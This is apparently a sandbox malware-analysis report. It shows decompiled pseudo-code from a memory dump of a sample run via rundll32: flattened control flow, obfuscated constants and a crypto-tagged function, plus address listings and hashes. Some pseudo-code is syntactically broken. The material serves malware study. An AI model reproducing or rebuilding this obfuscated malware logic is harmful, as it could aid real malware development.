							__eflags = _t927 - 0xe23336a;
							if(__eflags == 0) {
								_t927 = 0x66c3b1;
								continue;
							}
							__eflags = _t927 - _t1053;
							if(__eflags != 0) {
								goto L25;
							}
							E002B7027(_v108, _v116, _v80, _v328);
							L18:
							return _t1063;
						}
						if(_t1070 == 0) {
							_push(_v308);
							_push(_v416);
							_push(0x2b1518);
							_t891 = E002BAB66(_v300, _v172, __eflags);
							_t1036 =  *0x2d5c9c; // 0x0
							__eflags = E002CFBCF(_v276, _t1036 + 0x5c, _v80, _v392, _v400, _v408, _t891, _v284, _v332, _v300,  &_v76) - _v384;
							_t927 =  ==  ? 0x530629d : _t1053;
							E002BAE03(_v260, _v268, _v376, _t891);
							_t1065 =  &(_t1065[0xe]);
							goto L24;
						}
						if(_t927 == 0x66c3b1) {
							_push(_v144);
							_push(_v84);
							_push(0x2b15c8);
							_t897 = E002BAB66(_v216, _v136, __eflags);
							_push(_v388);
							_push(_v348);
							_push(0x2b1538);
							__eflags = E002C0EDA(E002BAB66(_v232, _v272, __eflags), _v128, _v200, _t897,  &_v80, _v264, _v96) - _v324;
							_t927 =  ==  ? 0x5edbe80 : 0x7114309;
							E002BAE03(_v428, _v188, _v88, _t897);
							E002BAE03(_v424, _v180, _v316, _t898);
							_t1065 =  &(_t1065[0xf]);
							L9:
							_t1053 = 0xf59c021;
							goto L24;
						}
						if(_t927 == 0x1936859) {
							_t905 =  *0x2d5c9c; // 0x0
							E002B68DE(_v364, _v280, _v240, _v104,  *((intOrPtr*)(_t905 + 0x58)));
							_t1065 =  &(_t1065[3]);
							_t927 = _t1053;
							while(1) {
								L1:
								_t1030 = 0x5edbe80;
								_t950 = 0x530629d;
								_t878 = 0x9627218;
								goto L2;
							}
						}
						if(_t927 == _t950) {
							_push(_t950);
							_push(_t950);
							_t967 =  *0x2d5c9c; // 0x0
							_t971 = E002C3512( *((intOrPtr*)(_t967 + 0x5c)));
							_t911 =  *0x2d5c9c; // 0x0
							__eflags = _t971;
							_t927 =  !=  ? _t1058 : _t1053;
							 *((intOrPtr*)(_t911 + 0x58)) = _t971;
							goto L1;
						}
						_t1074 = _t927 - _t1030;
						if(_t927 != _t1030) {
							goto L25;
						}
						_push(_v192);
						_push(_v380);
						_push(0x2b1568);
						_t912 = E002BAB66(_v420, _v292, _t1074);
						_push(_v184);
						_t1055 = _t912;
						_t700 =  &_v120; // 0x784a5e
						_push( *_t700);
						_push(0x2b1618);
						_t913 = E002BAB66(_v356, _v196, _t1074);
						_v64 = _v176;
						_t915 = E002CBA68(_v372, _v168, _v100, _t1055, _v412);
						_v56 = _v56 & 0x00000000;
						_v60 = _t1055;
						_v52 = 1;
						_v68 = 2 + _t915 * 2;
						_v48 =  &_v68;
						_t918 = 0x20;
						_v76 = _t918;
						E002B5C98(_v404, _v312, _t913, _v160,  &_v76,  &_v56, _v112, _v256,  &_v32, _t918, _v72, _v320);
						_t927 =  ==  ? 0x9627218 : 0xf59c021;
						E002BAE03(_v92, _v304, _v340, _t1055);
						E002BAE03(_v152, _v296, _v248, _t913);
						_t1065 =  &(_t1065[0x17]);
						goto L9;
						L25:
					} while (_t927 != 0x7114309);
					goto L18;
				}
			}




















































































































































                                                                                                                      0x002bcfce
                                                                                                                      0x002bcfd4
                                                                                                                      0x002bcfde
                                                                                                                      0x002bcff0
                                                                                                                      0x002bcff7
                                                                                                                      0x002bcff9
                                                                                                                      0x002bcffe
                                                                                                                      0x002bd004
                                                                                                                      0x002bd009
                                                                                                                      0x002bd00e
                                                                                                                      0x002bd016
                                                                                                                      0x002bd01e
                                                                                                                      0x002bd022
                                                                                                                      0x002bd02a
                                                                                                                      0x002bd02f
                                                                                                                      0x002bd037
                                                                                                                      0x002bd04a
                                                                                                                      0x002bd04d
                                                                                                                      0x002bd054
                                                                                                                      0x002bd05f
                                                                                                                      0x002bd06a
                                                                                                                      0x002bd075
                                                                                                                      0x002bd080
                                                                                                                      0x002bd08e
                                                                                                                      0x002bd08f
                                                                                                                      0x002bd095
                                                                                                                      0x002bd09a
                                                                                                                      0x002bd0a2
                                                                                                                      0x002bd0b8
                                                                                                                      0x002bd0bf
                                                                                                                      0x002bd0ca
                                                                                                                      0x002bd0d5
                                                                                                                      0x002bd0e0
                                                                                                                      0x002bd0eb
                                                                                                                      0x002bd0f6
                                                                                                                      0x002bd109
                                                                                                                      0x002bd10a
                                                                                                                      0x002bd111
                                                                                                                      0x002bd11c
                                                                                                                      0x002bd127
                                                                                                                      0x002bd12f
                                                                                                                      0x002bd134
                                                                                                                      0x002bd13c
                                                                                                                      0x002bd144
                                                                                                                      0x002bd14c
                                                                                                                      0x002bd157
                                                                                                                      0x002bd162
                                                                                                                      0x002bd16d
                                                                                                                      0x002bd175
                                                                                                                      0x002bd179
                                                                                                                      0x002bd17e
                                                                                                                      0x002bd186
                                                                                                                      0x002bd18e
                                                                                                                      0x002bd199
                                                                                                                      0x002bd1a4
                                                                                                                      0x002bd1af
                                                                                                                      0x002bd1b7
                                                                                                                      0x002bd1bf
                                                                                                                      0x002bd1c7
                                                                                                                      0x002bd1cf
                                                                                                                      0x002bd1d9
                                                                                                                      0x002bd1ef
                                                                                                                      0x002bd1f8
                                                                                                                      0x002bd203
                                                                                                                      0x002bd20e
                                                                                                                      0x002bd221
                                                                                                                      0x002bd224
                                                                                                                      0x002bd22b
                                                                                                                      0x002bd236
                                                                                                                      0x002bd241
                                                                                                                      0x002bd24c
                                                                                                                      0x002bd257
                                                                                                                      0x002bd262
                                                                                                                      0x002bd26d
                                                                                                                      0x002bd278
                                                                                                                      0x002bd283
                                                                                                                      0x002bd28b
                                                                                                                      0x002bd296
                                                                                                                      0x002bd2a1
                                                                                                                      0x002bd2ac
                                                                                                                      0x002bd2b7
                                                                                                                      0x002bd2c2
                                                                                                                      0x002bd2cd
                                                                                                                      0x002bd2d5
                                                                                                                      0x002bd2dd
                                                                                                                      0x002bd2e2
                                                                                                                      0x002bd2ea
                                                                                                                      0x002bd2f2
                                                                                                                      0x002bd2fa
                                                                                                                      0x002bd304
                                                                                                                      0x002bd308
                                                                                                                      0x002bd310
                                                                                                                      0x002bd318
                                                                                                                      0x002bd323
                                                                                                                      0x002bd32e
                                                                                                                      0x002bd339
                                                                                                                      0x002bd344
                                                                                                                      0x002bd35a
                                                                                                                      0x002bd369
                                                                                                                      0x002bd36a
                                                                                                                      0x002bd371
                                                                                                                      0x002bd37c
                                                                                                                      0x002bd390
                                                                                                                      0x002bd397
                                                                                                                      0x002bd3a2
                                                                                                                      0x002bd3aa
                                                                                                                      0x002bd3b2
                                                                                                                      0x002bd3b6
                                                                                                                      0x002bd3be
                                                                                                                      0x002bd3c6
                                                                                                                      0x002bd3d1
                                                                                                                      0x002bd3dc
                                                                                                                      0x002bd3e7
                                                                                                                      0x002bd3f2
                                                                                                                      0x002bd3fd
                                                                                                                      0x002bd408
                                                                                                                      0x002bd410
                                                                                                                      0x002bd418
                                                                                                                      0x002bd420
                                                                                                                      0x002bd425
                                                                                                                      0x002bd42d
                                                                                                                      0x002bd438
                                                                                                                      0x002bd440
                                                                                                                      0x002bd44b
                                                                                                                      0x002bd456
                                                                                                                      0x002bd461
                                                                                                                      0x002bd468
                                                                                                                      0x002bd473
                                                                                                                      0x002bd47b
                                                                                                                      0x002bd480
                                                                                                                      0x002bd484
                                                                                                                      0x002bd48b
                                                                                                                      0x002bd493
                                                                                                                      0x002bd49e
                                                                                                                      0x002bd4b2
                                                                                                                      0x002bd4b7
                                                                                                                      0x002bd4c0
                                                                                                                      0x002bd4cb
                                                                                                                      0x002bd4d8
                                                                                                                      0x002bd4db
                                                                                                                      0x002bd4df
                                                                                                                      0x002bd4ec
                                                                                                                      0x002bd4f0
                                                                                                                      0x002bd4f8
                                                                                                                      0x002bd503
                                                                                                                      0x002bd50e
                                                                                                                      0x002bd519
                                                                                                                      0x002bd521
                                                                                                                      0x002bd529
                                                                                                                      0x002bd531
                                                                                                                      0x002bd539
                                                                                                                      0x002bd541
                                                                                                                      0x002bd553
                                                                                                                      0x002bd558
                                                                                                                      0x002bd561
                                                                                                                      0x002bd56c
                                                                                                                      0x002bd577
                                                                                                                      0x002bd589
                                                                                                                      0x002bd58e
                                                                                                                      0x002bd597
                                                                                                                      0x002bd5a2
                                                                                                                      0x002bd5ad
                                                                                                                      0x002bd5b8
                                                                                                                      0x002bd5c3
                                                                                                                      0x002bd5cb
                                                                                                                      0x002bd5d8
                                                                                                                      0x002bd5d9
                                                                                                                      0x002bd5dd
                                                                                                                      0x002bd5e2
                                                                                                                      0x002bd5ea
                                                                                                                      0x002bd5f5
                                                                                                                      0x002bd600
                                                                                                                      0x002bd60b
                                                                                                                      0x002bd616
                                                                                                                      0x002bd61e
                                                                                                                      0x002bd629
                                                                                                                      0x002bd631
                                                                                                                      0x002bd636
                                                                                                                      0x002bd63e
                                                                                                                      0x002bd646
                                                                                                                      0x002bd64e
                                                                                                                      0x002bd656
                                                                                                                      0x002bd65b
                                                                                                                      0x002bd663
                                                                                                                      0x002bd66b
                                                                                                                      0x002bd676
                                                                                                                      0x002bd687
                                                                                                                      0x002bd68e
                                                                                                                      0x002bd699
                                                                                                                      0x002bd6a4
                                                                                                                      0x002bd6ad
                                                                                                                      0x002bd6b8
                                                                                                                      0x002bd6c3
                                                                                                                      0x002bd6d7
                                                                                                                      0x002bd6dc
                                                                                                                      0x002bd6e3
                                                                                                                      0x002bd6ee
                                                                                                                      0x002bd6f6
                                                                                                                      0x002bd6fe
                                                                                                                      0x002bd706
                                                                                                                      0x002bd70e
                                                                                                                      0x002bd724
                                                                                                                      0x002bd72b
                                                                                                                      0x002bd736
                                                                                                                      0x002bd741
                                                                                                                      0x002bd74c
                                                                                                                      0x002bd757
                                                                                                                      0x002bd762
                                                                                                                      0x002bd76a
                                                                                                                      0x002bd776
                                                                                                                      0x002bd779
                                                                                                                      0x002bd77d
                                                                                                                      0x002bd785
                                                                                                                      0x002bd78d
                                                                                                                      0x002bd798
                                                                                                                      0x002bd7a3
                                                                                                                      0x002bd7ae
                                                                                                                      0x002bd7b9
                                                                                                                      0x002bd7cf
                                                                                                                      0x002bd7d6
                                                                                                                      0x002bd7e1
                                                                                                                      0x002bd7ec
                                                                                                                      0x002bd7fe
                                                                                                                      0x002bd803
                                                                                                                      0x002bd80a
                                                                                                                      0x002bd815
                                                                                                                      0x002bd820
                                                                                                                      0x002bd831
                                                                                                                      0x002bd838
                                                                                                                      0x002bd843
                                                                                                                      0x002bd856
                                                                                                                      0x002bd85d
                                                                                                                      0x002bd868
                                                                                                                      0x002bd870
                                                                                                                      0x002bd874
                                                                                                                      0x002bd879
                                                                                                                      0x002bd87e
                                                                                                                      0x002bd886
                                                                                                                      0x002bd891
                                                                                                                      0x002bd8a4
                                                                                                                      0x002bd8ab
                                                                                                                      0x002bd8b6
                                                                                                                      0x002bd8c9
                                                                                                                      0x002bd8d0
                                                                                                                      0x002bd8d8
                                                                                                                      0x002bd8e5
                                                                                                                      0x002bd8f3
                                                                                                                      0x002bd8f8
                                                                                                                      0x002bd8fc
                                                                                                                      0x002bd904
                                                                                                                      0x002bd90c
                                                                                                                      0x002bd914
                                                                                                                      0x002bd91c
                                                                                                                      0x002bd921
                                                                                                                      0x002bd929
                                                                                                                      0x002bd92e
                                                                                                                      0x002bd936
                                                                                                                      0x002bd93e
                                                                                                                      0x002bd94d
                                                                                                                      0x002bd950
                                                                                                                      0x002bd95c
                                                                                                                      0x002bd960
                                                                                                                      0x002bd968
                                                                                                                      0x002bd978
                                                                                                                      0x002bd97c
                                                                                                                      0x002bd981
                                                                                                                      0x002bd989
                                                                                                                      0x002bd994
                                                                                                                      0x002bd9a7
                                                                                                                      0x002bd9a8
                                                                                                                      0x002bd9af
                                                                                                                      0x002bd9ba
                                                                                                                      0x002bd9c5
                                                                                                                      0x002bd9cd
                                                                                                                      0x002bd9d5
                                                                                                                      0x002bd9e0
                                                                                                                      0x002bd9e8
                                                                                                                      0x002bd9f0
                                                                                                                      0x002bd9fd
                                                                                                                      0x002bda01
                                                                                                                      0x002bda09
                                                                                                                      0x002bda14
                                                                                                                      0x002bda1b
                                                                                                                      0x002bda26
                                                                                                                      0x002bda31
                                                                                                                      0x002bda3e
                                                                                                                      0x002bda42
                                                                                                                      0x002bda52
                                                                                                                      0x002bda56
                                                                                                                      0x002bda5e
                                                                                                                      0x002bda71
                                                                                                                      0x002bda78
                                                                                                                      0x002bda83
                                                                                                                      0x002bda8e
                                                                                                                      0x002bda99
                                                                                                                      0x002bdaa4
                                                                                                                      0x002bdaaf
                                                                                                                      0x002bdaba
                                                                                                                      0x002bdac5
                                                                                                                      0x002bdad6
                                                                                                                      0x002bdadd
                                                                                                                      0x002bdae8
                                                                                                                      0x002bdaf3
                                                                                                                      0x002bdafe
                                                                                                                      0x002bdb09
                                                                                                                      0x002bdb14
                                                                                                                      0x002bdb1f
                                                                                                                      0x002bdb2c
                                                                                                                      0x002bdb34
                                                                                                                      0x002bdb39
                                                                                                                      0x002bdb41
                                                                                                                      0x002bdb46
                                                                                                                      0x002bdb55
                                                                                                                      0x002bdb58
                                                                                                                      0x002bdb5c
                                                                                                                      0x002bdb64
                                                                                                                      0x002bdb7a
                                                                                                                      0x002bdb81
                                                                                                                      0x002bdb8c
                                                                                                                      0x002bdb97
                                                                                                                      0x002bdba2
                                                                                                                      0x002bdbad
                                                                                                                      0x002bdbb8
                                                                                                                      0x002bdbc3
                                                                                                                      0x002bdbd5
                                                                                                                      0x002bdbda
                                                                                                                      0x002bdbe3
                                                                                                                      0x002bdbee
                                                                                                                      0x002bdbf9
                                                                                                                      0x002bdc04
                                                                                                                      0x002bdc0f
                                                                                                                      0x002bdc1a
                                                                                                                      0x002bdc2d
                                                                                                                      0x002bdc2e
                                                                                                                      0x002bdc35
                                                                                                                      0x002bdc40
                                                                                                                      0x002bdc4b
                                                                                                                      0x002bdc56
                                                                                                                      0x002bdc61
                                                                                                                      0x002bdc6c
                                                                                                                      0x002bdc77
                                                                                                                      0x002bdc82
                                                                                                                      0x002bdc8d
                                                                                                                      0x002bdc98
                                                                                                                      0x002bdca3
                                                                                                                      0x002bdcae
                                                                                                                      0x002bdcb6
                                                                                                                      0x002bdcbe
                                                                                                                      0x002bdcc6
                                                                                                                      0x002bdcce
                                                                                                                      0x002bdcd6
                                                                                                                      0x002bdce1
                                                                                                                      0x002bdcec
                                                                                                                      0x002bdcf7
                                                                                                                      0x002bdd02
                                                                                                                      0x002bdd0d
                                                                                                                      0x002bdd18
                                                                                                                      0x002bdd23
                                                                                                                      0x002bdd2e
                                                                                                                      0x002bdd39
                                                                                                                      0x002bdd40
                                                                                                                      0x002bdd4b
                                                                                                                      0x002bdd56
                                                                                                                      0x002bdd61
                                                                                                                      0x002bdd6c
                                                                                                                      0x002bdd7a
                                                                                                                      0x002bdd7e
                                                                                                                      0x002bdd86
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bdd93
                                                                                                                      0x002bdd98
                                                                                                                      0x002bdd9d
                                                                                                                      0x002bdd9d
                                                                                                                      0x002bdd9d
                                                                                                                      0x002bdd9d
                                                                                                                      0x002bdd9f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002be0f3
                                                                                                                      0x002be0f5
                                                                                                                      0x002be13e
                                                                                                                      0x002be145
                                                                                                                      0x002be15a
                                                                                                                      0x002be167
                                                                                                                      0x002be16d
                                                                                                                      0x002be178
                                                                                                                      0x002be18a
                                                                                                                      0x002be191
                                                                                                                      0x002be1a8
                                                                                                                      0x002be1ce
                                                                                                                      0x002be1e7
                                                                                                                      0x002be1ec
                                                                                                                      0x002be1ef
                                                                                                                      0x002be1f3
                                                                                                                      0x002be1fc
                                                                                                                      0x002be1f5
                                                                                                                      0x002be1f7
                                                                                                                      0x002be1f9
                                                                                                                      0x002be1f9
                                                                                                                      0x002be217
                                                                                                                      0x002be21e
                                                                                                                      0x002be21e
                                                                                                                      0x002be223
                                                                                                                      0x002be228
                                                                                                                      0x002be22d
                                                                                                                      0x00000000
                                                                                                                      0x002be22d
                                                                                                                      0x002be0f7
                                                                                                                      0x002be0fd
                                                                                                                      0x002be134
                                                                                                                      0x00000000
                                                                                                                      0x002be134
                                                                                                                      0x002be0ff
                                                                                                                      0x002be101
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002be120
                                                                                                                      0x002be129
                                                                                                                      0x002be133
                                                                                                                      0x002be133
                                                                                                                      0x002bdda5
                                                                                                                      0x002be05c
                                                                                                                      0x002be063
                                                                                                                      0x002be075
                                                                                                                      0x002be07a
                                                                                                                      0x002be0a5
                                                                                                                      0x002be0c9
                                                                                                                      0x002be0e3
                                                                                                                      0x002be0e6
                                                                                                                      0x002be0eb
                                                                                                                      0x00000000
                                                                                                                      0x002be0eb
                                                                                                                      0x002bddb1
                                                                                                                      0x002bdf96
                                                                                                                      0x002bdf9d
                                                                                                                      0x002bdfb2
                                                                                                                      0x002bdfb7
                                                                                                                      0x002bdfbc
                                                                                                                      0x002bdfc2
                                                                                                                      0x002bdfd4
                                                                                                                      0x002be01a
                                                                                                                      0x002be034
                                                                                                                      0x002be037
                                                                                                                      0x002be04f
                                                                                                                      0x002be054
                                                                                                                      0x002bdf22
                                                                                                                      0x002bdf22
                                                                                                                      0x00000000
                                                                                                                      0x002bdf22
                                                                                                                      0x002bddbd
                                                                                                                      0x002bdf66
                                                                                                                      0x002bdf87
                                                                                                                      0x002bdf8c
                                                                                                                      0x002bdf8f
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bdd93
                                                                                                                      0x002bdd98
                                                                                                                      0x00000000
                                                                                                                      0x002bdd98
                                                                                                                      0x002bdd8e
                                                                                                                      0x002bddc5
                                                                                                                      0x002bdf3e
                                                                                                                      0x002bdf3f
                                                                                                                      0x002bdf40
                                                                                                                      0x002bdf50
                                                                                                                      0x002bdf54
                                                                                                                      0x002bdf59
                                                                                                                      0x002bdf5b
                                                                                                                      0x002bdf5e
                                                                                                                      0x00000000
                                                                                                                      0x002bdf5e
                                                                                                                      0x002bddcb
                                                                                                                      0x002bddcd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bddd3
                                                                                                                      0x002bddda
                                                                                                                      0x002bdde9
                                                                                                                      0x002bddee
                                                                                                                      0x002bddf3
                                                                                                                      0x002bddfa
                                                                                                                      0x002bddfc
                                                                                                                      0x002bddfc
                                                                                                                      0x002bde0e
                                                                                                                      0x002bde13
                                                                                                                      0x002bde25
                                                                                                                      0x002bde3f
                                                                                                                      0x002bde46
                                                                                                                      0x002bde4e
                                                                                                                      0x002bde5c
                                                                                                                      0x002bde67
                                                                                                                      0x002bde75
                                                                                                                      0x002bde7c
                                                                                                                      0x002bde84
                                                                                                                      0x002bdecc
                                                                                                                      0x002bdef5
                                                                                                                      0x002bdeff
                                                                                                                      0x002bdf1a
                                                                                                                      0x002bdf1f
                                                                                                                      0x00000000
                                                                                                                      0x002be232
                                                                                                                      0x002be232
                                                                                                                      0x00000000
                                                                                                                      0x002be23e

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8s$#$*>@$.v:$/$0aQX$R5o$SSe$SN$^JxL$fFV$q<$rp$A@
                                                                                                                      • API String ID: 0-3270405876
                                                                                                                      • Opcode ID: 574d6e368205d17fafdfc36b54927843730fc9d41018c106c5606b3948b165ec
                                                                                                                      • Instruction ID: dca0ae06a56bc765485ced68010ed1ef8460e1a60027ff7e7bdef3c23d573ffa
                                                                                                                      • Opcode Fuzzy Hash: 574d6e368205d17fafdfc36b54927843730fc9d41018c106c5606b3948b165ec
                                                                                                                      • Instruction Fuzzy Hash: F592FE715093818FD3B9CF25C58ABCBBBE2BBC5304F10891DE59A86260DBB18959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B9A7D Relevance: 16.9, Strings: 13, Instructions: 679COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002B9A7D(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t761;
				void* _t762;
				void* _t764;
				void* _t768;
				intOrPtr _t770;
				void* _t775;
				void* _t784;
				void* _t796;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				void* _t814;
				void* _t880;
				intOrPtr* _t900;
				signed int _t902;
				void* _t903;
				void* _t907;
				void* _t908;
				void* _t915;

				_v120 = 0xaf91c9;
				_v120 = _v120 * 0xc;
				_t900 = __ecx;
				_v120 = _v120 ^ 0x083ad56c;
				_t907 = 0;
				_v160 = 0xdd67b2;
				_t796 = 0x60e8fa3;
				_v160 = _v160 + 0xffff9007;
				_v160 = _v160 ^ 0x00dcf7b9;
				_v128 = 0xd2bb52;
				_v128 = _v128 + 0x4dd6;
				_v128 = _v128 ^ 0x00d30928;
				_v340 = 0x29bf77;
				_v340 = _v340 | 0xa59b3ed7;
				_t802 = 0x26;
				_v84 = __ecx;
				_v340 = _v340 * 0x24;
				_v340 = _v340 / _t802;
				_v340 = _v340 ^ 0x02102f1f;
				_v136 = 0x5cee52;
				_t31 =  &_v136; // 0x5cee52
				_v136 =  *_t31 * 0x7d;
				_v136 = _v136 ^ 0x2d605e0a;
				_v108 = 0xa45e80;
				_v108 = _v108 | 0x375210cb;
				_v108 = _v108 ^ 0x37f65ecb;
				_v280 = 0xda067f;
				_v280 = _v280 / _t802;
				_v280 = _v280 + 0xffff2a0f;
				_v280 = _v280 ^ 0x0004e6dc;
				_v272 = 0x722186;
				_v272 = _v272 ^ 0xa185ec82;
				_v272 = _v272 ^ 0x3ba6498b;
				_v272 = _v272 ^ 0x9a51848f;
				_v292 = 0x4e3196;
				_v292 = _v292 + 0xb94f;
				_v292 = _v292 * 0x4e;
				_v292 = _v292 ^ 0x180b91c6;
				_v208 = 0x6998d9;
				_v208 = _v208 >> 0xe;
				_v208 = _v208 ^ 0x000001a6;
				_v240 = 0x4e7103;
				_v240 = _v240 * 0x4c;
				_v240 = _v240 ^ 0xd0eec6a6;
				_v240 = _v240 ^ 0xc7a74a42;
				_v312 = 0x7234ec;
				_v312 = _v312 ^ 0x522d2006;
				_v312 = _v312 << 6;
				_v312 = _v312 + 0x869a;
				_v312 = _v312 ^ 0x97c5c11a;
				_v364 = 0xaf3901;
				_v364 = _v364 + 0xffff0df3;
				_v364 = _v364 + 0xacd;
				_v364 = _v364 << 6;
				_v364 = _v364 ^ 0x2b91257f;
				_v244 = 0x42065a;
				_v244 = _v244 >> 8;
				_v244 = _v244 + 0x3d61;
				_v244 = _v244 ^ 0x000e9124;
				_v308 = 0x462496;
				_v308 = _v308 >> 1;
				_v308 = _v308 << 8;
				_v308 = _v308 + 0xc751;
				_v308 = _v308 ^ 0x2311deb1;
				_v372 = 0x2d527a;
				_v372 = _v372 >> 0xe;
				_v372 = _v372 << 0xb;
				_t902 = 0x27;
				_t803 = 0x29;
				_v372 = _v372 * 0x71;
				_v372 = _v372 ^ 0x027ecd5f;
				_v332 = 0xa669b;
				_v332 = _v332 >> 7;
				_v332 = _v332 + 0xd2e3;
				_v332 = _v332 >> 0xa;
				_v332 = _v332 ^ 0x000f2e3e;
				_v168 = 0x4e96bd;
				_v168 = _v168 << 3;
				_v168 = _v168 ^ 0x02701882;
				_v112 = 0xaba749;
				_v112 = _v112 / _t902;
				_v112 = _v112 ^ 0x0003e5b7;
				_v176 = 0xf83e47;
				_v176 = _v176 + 0xf669;
				_v176 = _v176 ^ 0x00f8a104;
				_v416 = 0x697041;
				_v416 = _v416 | 0x82970019;
				_v416 = _v416 / _t803;
				_v416 = _v416 + 0xffffd466;
				_v416 = _v416 ^ 0x0334f61d;
				_v252 = 0x15ebd3;
				_v252 = _v252 | 0x6e052c00;
				_t804 = 0x67;
				_v252 = _v252 / _t804;
				_v252 = _v252 ^ 0x0113ba89;
				_v276 = 0x344c30;
				_v276 = _v276 | 0x5d3660a5;
				_v276 = _v276 ^ 0x29f3ee58;
				_v276 = _v276 ^ 0x74c4d850;
				_v400 = 0xfbb174;
				_v400 = _v400 << 7;
				_v400 = _v400 ^ 0xf4a56f7f;
				_v400 = _v400 + 0xb6a2;
				_v400 = _v400 ^ 0x897127f1;
				_v408 = 0xeb5219;
				_v408 = _v408 + 0x740f;
				_v408 = _v408 << 0x10;
				_t805 = 0x65;
				_v408 = _v408 / _t805;
				_v408 = _v408 ^ 0x01f5cec8;
				_v268 = 0xb10ed5;
				_t806 = 0x6b;
				_v268 = _v268 * 0x79;
				_v268 = _v268 | 0x0fb1f039;
				_v268 = _v268 ^ 0x5fbe4096;
				_v132 = 0x68a9ad;
				_v132 = _v132 | 0x3a05ff43;
				_v132 = _v132 ^ 0x3a6b0a8d;
				_v392 = 0x795a70;
				_v392 = _v392 >> 0xd;
				_v392 = _v392 * 0x48;
				_v392 = _v392 / _t806;
				_v392 = _v392 ^ 0x000937af;
				_v236 = 0x1e45d1;
				_t807 = 0x32;
				_v236 = _v236 / _t807;
				_v236 = _v236 + 0xffffc842;
				_v236 = _v236 ^ 0x0007e8a5;
				_v228 = 0x827416;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x0826c6ea;
				_v284 = 0xd86f33;
				_v284 = _v284 << 0xe;
				_v284 = _v284 + 0xcd5c;
				_v284 = _v284 ^ 0x1bc78313;
				_v380 = 0x51f478;
				_v380 = _v380 | 0x2ab41351;
				_t808 = 0x6a;
				_v380 = _v380 / _t808;
				_v380 = _v380 ^ 0x7d9f8aa1;
				_v380 = _v380 ^ 0x7df5e8b9;
				_v192 = 0x594da7;
				_v192 = _v192 + 0xffff4010;
				_v192 = _v192 ^ 0x00542d8e;
				_v324 = 0x9c8afa;
				_t809 = 0x1e;
				_v324 = _v324 / _t809;
				_v324 = _v324 >> 0xb;
				_v324 = _v324 / _t902;
				_v324 = _v324 ^ 0x0001b8f0;
				_v212 = 0xd229d7;
				_v212 = _v212 << 3;
				_v212 = _v212 ^ 0x069444ca;
				_v288 = 0xa34a44;
				_v288 = _v288 ^ 0x8cd8fe8c;
				_v288 = _v288 + 0xffff9af8;
				_v288 = _v288 ^ 0x8c7655cb;
				_v220 = 0x9493db;
				_v220 = _v220 | 0x71cebed0;
				_v220 = _v220 ^ 0x71dfb10a;
				_v224 = 0xf1176b;
				_v224 = _v224 + 0xffffb0e2;
				_v224 = _v224 ^ 0x00f1becf;
				_v352 = 0xae98d2;
				_v352 = _v352 + 0xffffb89b;
				_v352 = _v352 * 0x11;
				_v352 = _v352 + 0x4d1e;
				_v352 = _v352 ^ 0x0b9fceb7;
				_v180 = 0x84b950;
				_v180 = _v180 >> 0xc;
				_v180 = _v180 ^ 0x00015b12;
				_v360 = 0x38dd65;
				_v360 = _v360 << 8;
				_v360 = _v360 << 0xb;
				_v360 = _v360 + 0xffffe7b0;
				_v360 = _v360 ^ 0xeb2159a9;
				_v188 = 0x175413;
				_v188 = _v188 | 0xeaa62ca7;
				_v188 = _v188 ^ 0xeab1c509;
				_v196 = 0x89f8f3;
				_v196 = _v196 | 0x84cde34a;
				_v196 = _v196 ^ 0x84ce03e9;
				_v204 = 0xfa0198;
				_v204 = _v204 + 0xba3a;
				_v204 = _v204 ^ 0x00fbcf1f;
				_v368 = 0x243d47;
				_v368 = _v368 + 0x6af1;
				_v368 = _v368 * 0x18;
